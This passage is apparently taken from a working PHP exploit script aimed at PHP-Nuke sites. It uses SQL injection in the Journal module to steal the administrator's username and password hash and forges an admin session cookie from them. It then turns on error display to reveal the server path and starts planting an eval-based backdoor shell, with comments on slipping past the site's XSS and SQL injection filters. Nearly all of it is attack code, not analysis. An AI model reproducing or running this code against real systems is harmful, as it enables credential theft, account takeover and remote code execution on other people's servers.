$http->postdata="title=wow\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";
$response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");
sleep(2);
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
$jid=explode("\">wow<",$jid);
$jid=explode("jid=", $jid[0]);
$jid=explode("\">",$jid[1]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);
$inj=explode("Last updated on ",$response);
$inj=explode(" @ ",$inj[1]);
$pass_hash=$inj[0];
$inj=explode("<",$inj[1]);
$user_name=$inj[0];
}
}else{
$http->postdata='';
//Find the primary key of the journal entry we just created.
$jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");
//we should have the single quote that we escaped at the end of wow'
$jid=explode("\">wow',<",$jid);
$jid=explode("jid=", $jid[0]);
//Check the journal for the admin's username/password hash
$response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);
if(!strpos($response,"31337")){
die("target has patched!\n");
}else{
print "Target vulnerable to a privilege escalation attack!!!\n";
list($junk,$aid,$pwd)=explode("31337 @ ",$response);
$aid=explode("<",$aid);
$pwd=explode("<",$pwd);
$user_name=$aid[0];
$pass_hash=$pwd[0];
}
}
}else{
$sex->sleep="sleep(5)";
print "Starting Attack Against:".$attack_url."/\n";
print "Testing for blind sql injection...\n";
if(!$sex->test_target()){
print("Target might be running 8.1.35\n");
print("Try the privilege esciation attack to upload the shell:");
die("./php_exploit -t -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
}
print "Target is vulnerable to blind sql injection!!!\n";
print "Please Standby For Attack...\n";
$pass_hash=$sex->find_md5("pwd");
$user_name=$sex->find_string("aid");
print "attacked used:".$sex->request_count." requests.\n";
}
print "Found Admin's name:".$user_name."\n";
print "Found MD5 Password hash:".$pass_hash."\n";
$admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";";
}
print "Using Admin Session ID:\n".$admin_cookie."\n";
$http->cookie=$admin_cookie;
//ipban.php
sleep(3);
//This request will tell us what version of php-nuke it is.
//If it is 8, then the page gives us configuration information to preserve.
$admin_options=$http->send($attack_url."/admin.php?op=general");
if(!strstr($admin_options,"Content-Length: 0")){
print "PHP-Nuke 8 detected.\n";
$option_values=explode("value='",$admin_options);
$x=0;
array_shift($option_values);
//Parsing out and storing configuration values to restore them after the hack.
foreach( $option_values as $value){
$value=explode("'",$value);
$values[]=urlencode($value[0]);
if($x++==4)
break;
}
//ipban.php
sleep(2);
//Enable error reporting
$http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
$error_reporting=$http->send($attack_url."/admin.php");
//Path disclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[].
$http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
$remote_path=$http->getPath($attack_url."/admin.php",3);
sleep(2);
if(strstr($remote_path,':\\')){
print "Windows box detected.\n";
print "Remote path:$remote_path\n";
print "Uploading backdoor...\n";
$remote_path=addslashes(addslashes($remote_path."\\frontend.php"));
$backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
//Could have used a concat but php-nuke filters for it. This hides <> from the xss filter.
//union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php